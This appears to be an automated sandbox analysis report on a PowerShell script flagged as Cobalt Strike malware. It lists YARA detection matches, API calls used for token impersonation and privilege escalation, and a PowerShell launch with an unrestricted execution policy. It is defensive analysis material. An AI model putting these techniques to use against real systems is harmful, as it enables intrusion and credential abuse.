                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.troj.evad.winPS1@2/5@0/1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0000022EFA0C0B70
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C867C TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0000022EFA0C867C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5noeq2o4.gsw.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: 3.ps1ReversingLabs: Detection: 73%
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
